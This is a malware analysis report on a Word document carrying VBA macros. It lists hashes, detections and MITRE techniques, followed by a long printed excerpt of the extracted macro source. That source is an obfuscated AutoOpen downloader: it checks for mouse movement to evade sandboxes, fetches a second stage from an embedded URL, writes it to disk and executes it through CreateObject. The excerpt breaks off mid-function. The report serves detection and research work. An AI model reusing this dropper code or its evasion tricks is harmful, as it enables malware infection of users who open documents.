Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c7c6fcfd63524b11…

MALICIOUS

Office (OOXML)

297.3 KB Created: 2018-02-27 14:28:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-06-01
MD5: 288ab3b32c8d090b542f3c45b5715079 SHA-1: 6e42b1bd7c7c4383c35f88cf6972ab5a7ef359d4 SHA-256: c7c6fcfd63524b11bcb63fd1ae22fec042adf48a66b5d829f8d8ce339bbc83e2
232 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is an OOXML document containing VBA macros, specifically an AutoOpen macro that uses CreateObject to download and execute a second-stage payload. The script attempts to download content from a URL and save it to a file named 'plit' in the current directory, then execute it. This indicates a downloader or dropper functionality.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6997892-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6997892-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    If rSAgKhA <> "" Then
    CreateObject(hGANfq.Tag).Open giUaahm
    End If
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
    Rem ourdickpbmanstrangereleasegtparalleldogs
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://digitalfolder.sanctuaryseries.ca/2d9a71b6f57b802� In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 110319 bytes
SHA-256: 1dd83a81f3a64e598f0ba94e8ff8701c3eebbf8d8b203f5c49fc99a2300f0a73
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 16 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "uIyYrO"
Attribute VB_Base = "0{9F54E12E-5639-48BA-8D54-26580024BA27}{6728C6D4-6CBB-448C-B0B4-8D07ECDAEE10}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function zvurket(ByVal exrAQuB As String)
Dim hZOKWlJ As Integer
hZOKWlJ = 0
Dim oEIbiRy As gnKhBRb
Dim jpHQiHj As gnKhBRb

While hZOKWlJ <= 3
GetCursorPos oEIbiRy
If jpHQiHj.phxGZuq = 0 Then
jpHQiHj = oEIbiRy
End If
hZOKWlJ = hZOKWlJ + 1
Sleep 1000
Wend
If jpHQiHj.phxGZuq <> oEIbiRy.phxGZuq Then
Dim wohddEX As Object, aqeljuf As Long, eSaUPkn() As Byte
Dim iUXEvaU: Set iUXEvaU = dhXSUqF(palqZJ.Value)
giUaahm = xuvuUd.Tag
Set wohddEX = dhXSUqF(xuvuUd.Value)
wohddEX.Open "GET", exrAQuB, False
wohddEX.send
Do While wohddEX.readyState <> 4
DoEvents
Loop
eSaUPkn = wohddEX.responseBody
aqeljuf = FreeFile
Dim rSAgKhA As String
rSAgKhA = ""
If Dir(giUaahm) <> "" Then Kill giUaahm
rSAgKhA = "plit"
Open giUaahm For Binary As #aqeljuf
Put #aqeljuf, , eSaUPkn
Close #aqeljuf
If rSAgKhA <> "" Then
CreateObject(hGANfq.Tag).Open giUaahm
End If
End If
End Function



Attribute VB_Name = "gNkmEs"
 Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal Milliseconds As LongPtr)
 
     #If Win64 Then
    Public Declare PtrSafe Function GetCursorPos Lib "user32" (lpPoint As gnKhBRb) As LongLong
    #Else
    Public Declare Function GetCursorPos Lib "user32" (lpPoint As gnKhBRb) As Long
    #End If

Type gnKhBRb
   phxGZuq As Long
   mVukrJF As Long
End Type


Public Function dhXSUqF(tZODEqu As String) As Object
Set dhXSUqF = Nothing
Dim oLNRdge As String
Dim sNKZJwM As Integer
sNKZJwM = 120
oLNRdge = "quit"
If sNKZJwM Mod 10 = 0 Then
oLNRdge = tZODEqu
Set dhXSUqF = CreateObject(oLNRdge)
End If
End Function

Sub AutoOpen()
Rem ourdickpbmanstrangereleasegtparalleldogs
weblognhfreezeimplementingguitarsmods = 741 Mod 167
breadpractitionersbelizeparticipatedyardsdancing
dantractorsooncrterminationfromvoip

Dim wtwnGPl  As String
wtwnGPl = uIyYrO.palqZJ
Dim eXQFsva As String
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
objHTTP.Open "GET", uIyYrO.palqZJ.Tag, False
objHTTP.send ("")
eXQFsva = objHTTP.responseText

uIyYrO.zvurket (eXQFsva)
End Sub
Sub dantractorsooncrterminationfromvoip()
surgicalcompletionvalentinefoundertimesfasterwhathomelandnotesreproduced = 628 Xor 606
gotparticleartisticparameterslegendsmoderate = Not (409 < 887)
kylezipoverheadjuandebtrotationforum
Dim nzcandlesidentitytioncornellplayboy() As Byte
campingdynamicsexohaitigooglechargessortsappreciation = 5636
End Sub
Sub kylezipoverheadjuandebtrotationforum()
bushwarsizedemonstratesinfraredjoantranssexualdiscount = Space(82)
Dim gcdueprerequisitepopulationsbobandrewneighborescorts As String
vacanciesmintgeorgecarolinatrustsreprintsdelconsortiumdeniedruth
operatortroopsbroughtquantumansuddenlytoolbarbrands = 181 Xor 885
For askcopyrightedsufficientbeta = 2996 To 5619
Dim hungarianwealthgoneslowlykindalpirarobotathleticsnurse() As Byte
reynoldsmarsdatesinvestigationreutersrefinesampleever = Not (84 > 334)
Next askcopyrightedsufficientbeta
End Sub
Sub vacanciesmintgeorgecarolinatrustsreprintsdelconsortiumdeniedruth()
Dim unexpectedprooffellowshipomansituatedsarapreparedspleasantlabels As Integer
For advisedtireschangesbreakfastwitnesses = 3515 To 7603
Dim cyclebudgetasthmapromotedsettlementmistake As String
shotsextrashelpingfeamericalampndamenitiesquizzes = RTrim("xeroxdonationcollectorsurprisingtoddbuilddb")
Next advisedtireschangesbreakfastwitnesses
consolespankingwithingenrepathologycontributionfirenoonmf
murderincorporatedbaselinelargelyhayesgrabsole = Not (321 < 330)
somebodyhelenapractitionerspowersellerroulettetankthemespam = Array("confplatepursuitazerbaijantonguewhilecolonprobefwd", "deeperstrictlytitlepdfdeutschesolidcreator", "squirtcatchtrailpreservepickedpdaupadolescentgardens", "hansmagnificentqueriespetsimattresslouisianasearchvbulletincar", "punishmentedinburghwaltergonetrance", "extendsmagnificentbecomevacuumsummit", "maireferralmovementappearanceballot", "heathiretermsroughcreatemorequebecfebruaryindirectenabling", "certainadditionalcommonwealthistvidsatlanticleavewavematthew", "bestsellerssagemixingincurredamendmentspoundslingeriepussy", "enteredrepresentingflexwedding", "metadataposingconcentrationwwwbingo")
End Sub
Sub consolespankingwithingenrepathologycontributionfirenoonmf()
Dim prospectivevalvelabourpotteryprovidencecompletepupils() As Byte
phraseintroducebloggingsphere = 9417
vesselsemptyeaglegst
Dim weldingrichwhaleworldsexhitspendczrefinance As Variant
waltericssonswitchdeepmonstershourlysamoa = 257 Mod 256
End Sub
Sub vesselsemptyeaglegst()
kansasbulgariamousejudgecentersassociatedot = RTrim("mdhdvegetarianactivistspeakauthoritiesquarterfloyd")
sessionsattemptedplatformgloberegularlycompleted = 450 Xor 702
buttsbbwbesidescdsadsshownarrangementsphrasescontinent
unavailablemunicipalitynursesupportsvaninvolvingburton = StrReverse("lotsmetestgothumanitiesbeginners")
capsooopickedadmissionsarsimsplanner = Not (325 > 634)
End Sub
Sub buttsbbwbesidescdsadsshownarrangementsphrasescontinent()
sixthlaborsomasenderghostmartincuttingradiation = StrReverse("madeplanetdistinguishedhisean")
Dim readsportugalhandlingsitemapsynthesispersonnel As Variant
coalbindingbeingaccountsrpwe
theatrepatminutesachievements = Chr(219)
Dim necessarybreastsconservationutilityserumplugins As Object
End Sub
Sub coalbindingbeingaccountsrpwe()
bestcutknittingdocpoletechnicianpt = StrReverse("divisionslearningseasonsoilsknowsvocalvisitor")
stageatmdelightcapabilities = RTrim("eddiedetroitbulgariaphaccomplishedbenchstringsregardsdb")
longerqatardroveconsentknewmarionconfirmchesterslovaktelling
Rem pontiacwesternareaadoptattackedhcnude
Dim affiliateskidneydepositsicpromotionalrawblanketconnectors As String
End Sub
Sub longerqatardroveconsentknewmarionconfirmchesterslovaktelling()
For colourcontrollingtagsjulynearlyyeallandelicious = 1867 To 4832
For accomplishfamiliarinstantlycr = 1423 To 6939
Dim talkingcolondamagereads() As Byte
merelygenuineprocessstomachwpfrontierproteinroyalcrapsuggests = Not (361 < 817)
Next accomplishfamiliarinstantlycr
apprenderingdecentveterandurationvictimlandssr = RTrim("basinifpreptransfersentrepreneursequipmenthard")
Next colourcontrollingtagsjulynearlyyeallandelicious
chambersselectingalabamareflectsuspectspokesman = Array("hierarchyminimumredeeminheritedtaxationamberfsuhst", "adhurricanepurchaseswrittenwasher", "ppcstealmoreoverofficeschelsearegularlythehunglasgowincident", "rugkazakhstancharacterarmstrongvoiceschenprepareherbs", "dustafghanistanbalirapcelebrateseminarscapabilitiesproductivitybranchesreg", "cakesiraneighborhoodyrmetadataconspiracyspentcrapsjoanintervals", "isovatrationallawsalphaadvancebeginnerscookiesseemedcoin", "increasingadvertkeeninducedtheycandidates", "accidentstennesseetilslightlybestsellers", "outstandingenterprisespillowdecortoshibaretailfairfieldalphabeticalbowattachment", "salvadorcnnwebsiteboarddevexcitingpredictionslie", "taxinewspaperspeakstempleimportancebuildschannelpanties", "coffeesomewherecollegerunsfactorlisteningdelaware", "attachstylusbecometmchanginggayunknowntakediamond")
clustersmanufacturersconsistscharging
absoluteexcessguaranteedlist = Array("genresworkingtrinidadharoldcltoiletstandingsgrowthlectureunexpected", "dcshepherdsbjctsubcommitteeinsights", "efficiencyneededweapondifficultyzones", "blacksdemographichoustonsimplified", "stopsfogconfirmationgroupscfrbreed", "yukonsavestransparenttranscriptresponsibilities", "optimummyselfindicatingrestrictspecify")
Dim varyingfleetbreastpanels As Integer
End Sub
Sub clustersmanufacturersconsistscharging()
requestexpectcyclesdomesticregistrationpolicy = 595 Mod 1004
dontrailscyclingconsensusprairiemarvelhumansboulderrely = 706 Mod 446
thoughtnormtsmultimediapastoremployeecitizenship
keyboardnearstudyinginjuries = Not (731 > 282)
onionassetsmetapottercamscontacts = 4100
End Sub
Sub thoughtnormtsmultimediapastoremployeecitizenship()
assetexploreboolflashers = 641 Mod 782
acreragefamiliartoll = Not (704 < 802)
contributorblanketsolmedicinesthoroughlyretiredcompete = ""
contributorblanketsolmedicinesthoroughlyretiredcompete = contributorblanketsolmedicinesthoroughlyretiredcompete + StrReverse("ub\")
Dim duodannycoordinatedlafayetteindextrucksbudgetsfindsdiamondsuggestions As String
kingsdirememberhorribledickschapterabilityyourself = Not (448 < 254)
contributorblanketsolmedicinesthoroughlyretiredcompete = contributorblanketsolmedicinesthoroughlyretiredcompete + StrReverse("enis")
Dim schedulingformattingpaymentsentrancespokesman As Boolean
bosniahdpenmysterious = LTrim("tracydamageliterallysinghdeepinterstatechangingsomaliahenry")
contributorblanketsolmedicinesthoroughlyretiredcompete = contributorblanketsolmedicinesthoroughlyretiredcompete + Mid("dollarsassetdiffscompetitionrevenuesssalllegsexogrowthislestreetobjectoaksquad", 37, 5)
Dim webdifficultcampingfactsinquiriesstatuteshammerbraburied As Object
Dim cprpwillowrobertlaptopambien() As Byte
contributorblanketsolmedicinesthoroughlyretiredcompete = contributorblanketsolmedicinesthoroughlyretiredcompete + StrReverse("awo")
siemensengineershandlingexclusivelyusgsbeltsignificantlyspenceroh = Not (296 < 838)
attractionsstatementsprecedingfailedjeanssayteacherdiego = Not (346 > 867)
contributorblanketsolmedicinesthoroughlyretiredcompete = contributorblanketsolmedicinesthoroughlyretiredcompete + StrReverse("ayecn")
'pageclinicalstephenqtresellerwheelsjunctionabsolute
requiringproxyindividuallybmwsignificantlymilfhunter = RTrim("prescriptionmemocivilizationcatseffortvotecurrencynotebooks")
contributorblanketsolmedicinesthoroughlyretiredcompete = contributorblanketsolmedicinesthoroughlyretiredcompete + Mid("expiredzoloftupdatedlivescomeeffectivenessmtvcruiseshapechttrickswmasignalsforever", 57, 3)
isaacmanchesterfetishmusicianclaireloanmetertimeline = LTrim("clanchestcashtranscriptsleft")
senliablepunktranscriptsabsolutebroadcastnikonkittoddlerproprietary = RTrim("buriedwebmasterbphirereferred")
contributorblanketsolmedicinesthoroughlyretiredcompete = contributorblanketsolmedicinesthoroughlyretiredcompete + StrReverse("ennam")
Dim essaysequivalentkoreanpotdonobjnovacamstationerylan As Boolean
rapidlyfleeceprettyconstraints = RTrim("offshoreperiodicallowingoppositionfotogone")
contributorblanketsolmedicinesthoroughlyretiredcompete = contributorblanketsolmedicinesthoroughlyretiredcompete + Mid("normanempiremoralnissanwineschangesyesmetersrhotmgeographicalworksdenlocatorprovidersfloristsitesham", 45, 5)
dealkinddevelopingpanels = Not (913 < 260)
originalwarriorstreatcursorpackingsodiumtouringmontanacgi = Array("levitracommitmentsmereshadecachecornwallexpectmetervulnerabilityconcerned", "exploringurwclerkduostrikinglipspitspice", "countspixdivmitsubishiregressionbutt", "enginesquerevealsj", "suburbanftoptimalcommunicationselectioncachedhoseseriesadopted", "harperrelatedslidesight", "prioritieswantednetworkpstgreatsloveniavessel", "constructimpressedappearssizeadapters", "chevykarlreloadproceedscalculatorsnumber", "teenslimecontrastslidesliabilitychambersequivalentsameddtube", "indicatorsharpersalariescasino", "metricsuddenhrefreflectschuckporkcouldcollar", "definefancyhellelementnextaforange", "suckusatlanticpresenceundertakenbenchcustomfrancemarchprefer", "boredinteractionsbhutanownershipautumnleodeviltoward")
contributorblanketsolmedicinesthoroughlyretiredcompete = contributorblanketsolmedicinesthoroughlyretiredcompete + Mid("hillsagecolleaguephcontinentalpaperbackpleasedassistmattersailklfacesknightcorrelationlacktelephonereplace", 60, 5)
Dim assignstaylegalbearingpersonnel As String
conspiracyantiquesquestionmarshallnurses = Not (180 < 1009)
contributorblanketsolmedicinesthoroughlyretiredcompete = contributorblanketsolmedicinesthoroughlyretiredcompete + StrReverse(".nie")
singinghindutelecomheadsetmomssharksouthwestexamined = Not (857 > 105)
arepopelearningbyteletterparts = LTrim("ultimateshortlyupcomingantiviruspass")
contributorblanketsolmedicinesthoroughlyretiredcompete = contributorblanketsolmedicinesthoroughlyretiredcompete + Mid("nvidiarolandpubsmandateblanketexespacerivertailsocietiesnewmanconsecutivecamera", 31, 3)
ownednasdaqconstructdicedecisionfloppyimmigrantscrack = StrReverse("sophisticatedsenegaljournalsfieldgrillmhz")
resortproductsmanualpermitdetailsconsoledeclaredbuttsnavigationsomalia = LTrim("twinkslyingcollegemardiconvertedimpliedpersonalherselfperformingparish")
dftaskshealthcarefollowingfountainforcevcrreleaseps = ""
dftaskshealthcarefollowingfountainforcevcrreleaseps = dftaskshealthcarefollowingfountainforcevcrreleaseps + Mid("generatormicrocaymanbiotechnologyatetmplarryplumbingsufferingultrasatisfactorykijijifunk", 37, 3)
Dim iccollapsequestionencouragingstylushipbowlbettercompilergibson() As Byte
inchesomegarogerstelephonecolleagues = Space(80)
badlyoneaugmodesdevildrivenyrseditorsfloat = ""
badlyoneaugmodesdevildrivenyrseditorsfloat = badlyoneaugmodesdevildrivenyrseditorsfloat + Mid("bowlsectorssuccessfullyusbcentrescontpatientorganisationsrecordingsmaplepapersflows", 34, 4)
Dim pdastrainedwyomingbbsisbnpatio As Boolean
Dim cutpreviousmonstersk As Boolean
badlyoneaugmodesdevildrivenyrseditorsfloat = badlyoneaugmodesdevildrivenyrseditorsfloat + Mid("influenceschemaresolutionsshefastworkerinuoudecadedesirefeaturedbranchestenantreportedinnovativesignslawyer", 40, 5)
For touringreferenceshispostageplaintiffmeatnailgadgetscommitmentsmovies = 6656 To 2749
brokersshowersharborprospective = Not (437 > 763)
Dim stoodfgpunchfestivalsgotocommit As Boolean
Next touringreferenceshispostageplaintiffmeatnailgadgetscommitmentsmovies
emissionsphotographmaybebasenamedictionaryconnected = LTrim("designsbocicthunteregyptehentry")
badlyoneaugmodesdevildrivenyrseditorsfloat = badlyoneaugmodesdevildrivenyrseditorsfloat + StrReverse("rpyls")
Rem scholarshipdualinlinephp
customizedassignpuzzlesufferflagslawyersupgradeselective = 937 Xor 768
badlyoneaugmodesdevildrivenyrseditorsfloat = badlyoneaugmodesdevildrivenyrseditorsfloat + Mid("booksupplierspurchasepredictclaygangbangblvdperspectivesoducmasklargermessagingsuccessfullygovernorwiderworkplace", 57, 4)
Dim flagsextensivediscriminationmeteroutsideprettylitigationorlayoutgetting As Integer
Dim radiationvintagehotelsrichmondralphpostingspgconsideringcartoonsarrest As Object
badlyoneaugmodesdevildrivenyrseditorsfloat = badlyoneaugmodesdevildrivenyrseditorsfloat + Mid("orgytextilespetsheartsailingfoxsexobaltimoreersconsultantsmeaningfulexpiresrespectcontrollersbrunette", 45, 3)
carefullyxpprobablysmellrangingcannonvoipyeast = 3653
'fallsamendfaqsjuntapejan
badlyoneaugmodesdevildrivenyrseditorsfloat = badlyoneaugmodesdevildrivenyrseditorsfloat + StrReverse("ssa")
For framingchromeneededavoidstanfordblakekeyboard = 3501 To 4539
Dim involvesrgnextelhostelssawvariationcreatecoolingextendedtennessee As String
unusualvoyuerlettingdryhimmanitobababiesmalaysiagordon = Array("tribunalphasemarkingmysteriousbyteappreciate", "addingdrivesraisedibmcurrentstays", "malpracticeperformedsexualhungryteachesensembleadultreceiptclerk", "outsourcinginformlipultimatepapuaanatomyfail", "shakirabeamdiffsnortheastchangeddivisioninfringementvirtue", "networkingcostumebssepheartthee", "levelmonitoredfacultyimplementtribewashdevelopedjohnnyherbslatinas", "malaysiaamountaircrafthourly")
Next framingchromeneededavoidstanfordblakekeyboard
acquisitionsprintersdeptelectionaccountbridgespringfieldfast = Space(80)
badlyoneaugmodesdevildrivenyrseditorsfloat = badlyoneaugmodesdevildrivenyrseditorsfloat + Mid("moveoccupationsalbumspacksangeremblequicklyhiltonrawlabelsbiz", 32, 5)
humidityfolksdeclarationfilmfrost = 2929
firewireconnectedfactsjungleworkinghelps = Array("undrealtorsappreciatedinquirydidfrineeds", "everywhereconfigrearyeasttorturer", "likewiseoddsvampirejudgessuckads", "mistakesnotebooksnobodytelescope", "smellbakerjjmomscollectingpaintingsappraisal", "wholepickedduchevydepositportionscruiseslemonwhen", "optexpectedtheologyebayrecentlysharewareconvertedsudandisplays", "hydrocodonebeastsomaliasomebodyalexandriaanimeburiedlaserstrategic", "dcreatelouisianaparticipationseetimelineclerkinnsfacesperm", "plasmadevicesimmigrationlazymeant", "recentlymutualorgregardedidholdsreggaefair", "iecamscatalogsindicatorsfridgeandwireseasonslaidusc")
badlyoneaugmodesdevildrivenyrseditorsfloat = badlyoneaugmodesdevildrivenyrseditorsfloat + Mid("browsersdeskbyeprocurementaidscanyondrainranobservecollegedasselectroaimmicheldirtmain", 59, 4)
Dim meantreflectedfakepartialfundamentalsclaradomesticlegend() As Byte
Dim lampscompetentlatexwrapcandidatescanberrasequencetrustee As Integer
badlyoneaugmodesdevildrivenyrseditorsfloat = badlyoneaugmodesdevildrivenyrseditorsfloat + Mid("foolpointsorganiseddisposaljonesalongistaamongstsignedconvincedallowanceverifiedtradeaceupsetdefinitionsinto", 38, 4)
resetnhsprayinvestigationsreviewedaccessing = LTrim("hometownfindingsnewsexbrideelevationgoddesresponsibilities")
incidenceskillinterhungrythereafterregistrationratiodistricttueway = LTrim("latelyincreasingdistinctannotationmicrosofttrusteespromoteassistantfeatures")
badlyoneaugmodesdevildrivenyrseditorsfloat = badlyoneaugmodesdevildrivenyrseditorsfloat + Mid("nnsystemsterrorismdeservecoleitalicntcharmsrehabilitationfoolchromeevent", 36, 4)
vacuumfewsewingpackardjapanesecaughtperiodicallycounty = 1646
Rem pridedaisyspencerburkemetricleopushedcurtislost
badlyoneaugmodesdevildrivenyrseditorsfloat = badlyoneaugmodesdevildrivenyrseditorsfloat + Mid("navigationaccessoryruntimeacceptingampiosexcamformationkytabshourya", 36, 5)
sovietchestcountyimports = Not (911 > 341)
screenstudrockymeetpresentingsticked = Chr(195)
badlyoneaugmodesdevildrivenyrseditorsfloat = badlyoneaugmodesdevildrivenyrseditorsfloat + Mid("flexibleorganizingsublimecataloguelotteryringtonesauthenticnshipreciselycombiningtenantandorrayardquestionfollowedcdsenemies", 60, 4)
polishconfirmbreastsviewingincorporatewantcambodiaidemarina = StrReverse("vidsreproductiveflprescriptionwwsunshinehighlightvictoryannoying")
Rem namstringsundergroundteachersplacementfreelockedconceptualsbjctbool
badlyoneaugmodesdevildrivenyrseditorsfloat = badlyoneaugmodesdevildrivenyrseditorsfloat + StrReverse("ssp")
Dim practitionersmarchacreseducatedyarnsaw As Object
Dim housesabcoccurringinterfacesaualonecontheorem As Variant
badlyoneaugmodesdevildrivenyrseditorsfloat = badlyoneaugmodesdevildrivenyrseditorsfloat + StrReverse("wol")
readingenhancementpepperwxnegotiationsncaaarrestboatingglossary = 296 Mod 561
Dim fatalhiveliminatereform() As Byte
unknownusagelorougeadobegi = ""
unknownusagelorougeadobegi = unknownusagelorougeadobegi + StrReverse("lehs")
Rem laptopapplicationrickcontainmunichregisterproved
Dim applenwpowelladministrationcelebs As Boolean
unknownusagelorougeadobegi = unknownusagelorougeadobegi + StrReverse("a.l")
especiallydaytonwhileclan = Chr(248)
metadesignedutahldpetswow = 6478
unknownusagelorougeadobegi = unknownusagelorougeadobegi + StrReverse("cilpp")
Dim wrapextendingformsdataairlinesmel As Object
mobilityincidentsuchsipdonalddependingplasticsdigscenesfilms = Not (156 > 700)
unknownusagelorougeadobegi = unknownusagelorougeadobegi + Mid("vikingsaysdadorgyfavouritesaccordingscancomplexityatioremainedforgetmoseshandedbloggers", 51, 4)
Dim driversjaguargrowthrootclinicbloggers As Boolean
innerbabejapanlaunchedmascapablegigchapterdiagramchapter = StrReverse("rjvoiceschairorganizationsseparatelypolitical")
unknownusagelorougeadobegi = unknownusagelorougeadobegi + Mid("ranchpasswordsokadditiondisorderspreadcharmsrnconjunctionroyalseatschemescauseparticlespeechblockdirective", 46, 1)
actualtimothywatsonsurveysspeedbannedunexpectedamsterdam = RTrim("councilsinsuranceafterwardsyardprecisereviewingpregnancyresume")
reliablecomedeclinegripdeaththanks = Not (745 > 379)
Dim jumpingcharityagingchickshearttions As String
teachhalloweendisastersoftcenturiessriemacsemergingsomewhere = Not (425 > 794)
Set dnaportugalenhancingipsrefugeesitemtreatedartwork = CreateObject(unknownusagelorougeadobegi)
polandaskbacteriamichelacermarinashippingbeat = LTrim(badlyoneaugmodesdevildrivenyrseditorsfloat)
Dim claypaxildeclareroadstruckpdtpubmedpackagingoutdoortribe As Boolean

'tonereasiermaltayamahatokendiscoveredpoems
Dim informedconcernedveteranthursdaypalepcindustryneighborhood As Variant
smallestinputsreliefhandleswebcamscashiersbiology = 620 Mod 118
Dim gamecubeunionmeasurementknifecertifiedobgheights() As Byte
End Sub
Sub breadpractitionersbelizeparticipatedyardsdancing()
muzemailedorderactivatedkuwaitphonesfeaturepeaselimination = Not (898 > 148)
appliedcheckoutdollsluxembourg = LTrim("deficitmeaningdarknessqualitieslatersettingsmxtried")
worldwidelogoskaraokeafterwardsbleedingwyplacecumdx
publicationsnegotiationdistancesestablishantivirusarisinghandjobtwistdollarsneighborhood = LTrim("eosstocksewingbritain")
sololectureseconomyrefusednigeriadigfur = 8802
End Sub
Sub worldwidelogoskaraokeafterwardsbleedingwyplacecumdx()
terminalsgenuinemadagascarloanclubsgamblingtrusteeneighborlobbytubes = 5060
Dim preservationaffordfogfactorconvergenceessayaccommodationsspraylookrespiratory As Boolean
findbeautifulreductiontriesmichellealwaysrefuseplenty
inviteaskswingsmargincivilthantaiwanddrrain = Not (141 < 832)
For connecticutabletaxharassmentprojectlefthencesister = 8756 To 4577
Dim portionapacheromancetriggerautomateddeadline As Boolean
Rem cantenglandpaintmsn
Next connecticutabletaxharassmentprojectlefthencesister
End Sub
Sub findbeautifulreductiontriesmichellealwaysrefuseplenty()
weekrogersfewertermroyaltrading = Chr(210)
religioninfrastructureyouremarkablepjrecorders = StrReverse("momichaelfurnitureadvisedfailing")
mazdaferryintervalsinteractioncleaningsunday
Dim adjustabledelightsgjordanfibermembership As Object
Dim killsmineralmongoliahamiltonactivelyadoptarborthy() As Byte
End Sub
Sub mazdaferryintervalsinteractioncleaningsunday()
turningstartuplankamacedoniaflexteacherfundednngarbage = Not (779 < 333)
giafteensgeorgiaincomingvihawkparticular = Space(65)
arrangementseverydayobtainedmaintainscataloguejokesluisassistanttapes
presentedinstalledhotevidentholdsdesktopsknightsvhsquebec = Not (715 < 65)
daisywonderfulhandbagsjudicialdestinationstranscripteducationmu = 466 Mod 1022
End Sub
Sub arrangementseverydayobtainedmaintainscataloguejokesluisassistanttapes()
'commissionersisraeliverificationgazettefascinatingviewer
For transparentdevelopinginvestenrolledteamintegration = 9021 To 5958
raisingframeworkrememberedwaveaccepting = 825 Xor 431
Dim largerskilladdictionvariesdeutschedebutfacialinvitations() As Byte
Next transparentdevelopinginvestenrolledteamintegration
frostcommstrdata
allocationstrictthankchairmandrunknearbyarmscalculationvehicle = Array("trusteesnewspapersofflineorcontentscalculatechargingallanextract", "griffinpioneerlegsunitinitiatedpvcflowgaysporkinsulation", "tightadventuresconceptualbusesreplicationlolitastandardsannouncementptsprofessionals", "willsitemapagewealthhourpayablematebottomtravelerellis", "hendersonroommatesconcentrationsillframediseases", "reproductivematthewmajormagchildrenmeatbiosathletic", "excessiverelationoecdoaklandexcerptverticaldiscipline", "collectorpspprostoresstatusrevengecontroversialsbjctdiverseamount", "ceogreetingreformtutorialslogged", "dimensionilasidecharacterization", "fotogsmdivingtent", "bannerairportfabulousgeneratesbackedbirdssafelyforceswwexperienced", "wherevercommonwealthvacationsbushcdthatetc")
fictionbukkakehintfuelear = Array("fridgechryslersupervisorsbincompliancewhomdavidsonwidecoachestwiki", "cartooncitiesdefinenicknamecounselingbritishquitdiesviking", "subjectcomplexgenerallyfamiliarfailjungle", "challengesdivxwhozoomsoftball", "njcradletwistedlatina")
End Sub
Sub frostcommstrdata()
greecedirectorytransactionmg = Space(57)
Dim statementpersonsticketsweekscientistswitchingleastperspectivestamps() As Byte
maximumprincetonlocationsincidentenhancementtaitalydas
fcaimszumthrowhopbasedarriveentertainmentmusiciancostume = Chr(148)
'loanbritainwrightwitchoutlineddiscskenyaillinoischanges
End Sub
Sub maximumprincetonlocationsincidentenhancementtaitalydas()
For lcdameallowssuepiratesacoustickepttime = 3706 To 7893
Dim collectordchomelandacceptablehisleasingjointbehavioralbumsoul As String
Rem grooveindigenousfederationcampaignsme
Next lcdameallowssuepiratesacoustickepttime
nonecorrectantoniosublimereverseseat = Chr(178)
attorneysocietiescoordinationhangseanlaterlaura
Rem audpalestinehorrorfancytorontocustomiseexpensive
bytesindividualsprisonerscostumes = Chr(2)
End Sub
Sub attorneysocietiescoordinationhangseanlaterlaura()
addressolympuspolandproblemsministerclean = 782 Xor 425
minimumbelizelabelsxpinvitationestoniaadvertisercompetitionropecovering = Space(77)
ratiodrewbufferdocumentedmooddonationslettingvaccinebanned = ""
ratiodrewbufferdocumentedmooddonationslettingvaccinebanned = ratiodrewbufferdocumentedmooddonationslettingvaccinebanned + Mid("picksinsertionatashapedhipaquaticbroadlaptop\busairfarekwreactionsgratefulcoverexplain", 45, 4)
dvdsphenomenonfioricetdevotedwavcontributingadministratorsnursebiodiversityrice = LTrim("shorehughgravitycpampland")
Dim princehandjobsmetadataduicartoonsexpiresheavywakemetallica As Object
ratiodrewbufferdocumentedmooddonationslettingvaccinebanned = ratiodrewbufferdocumentedmooddonationslettingvaccinebanned + StrReverse("eni")
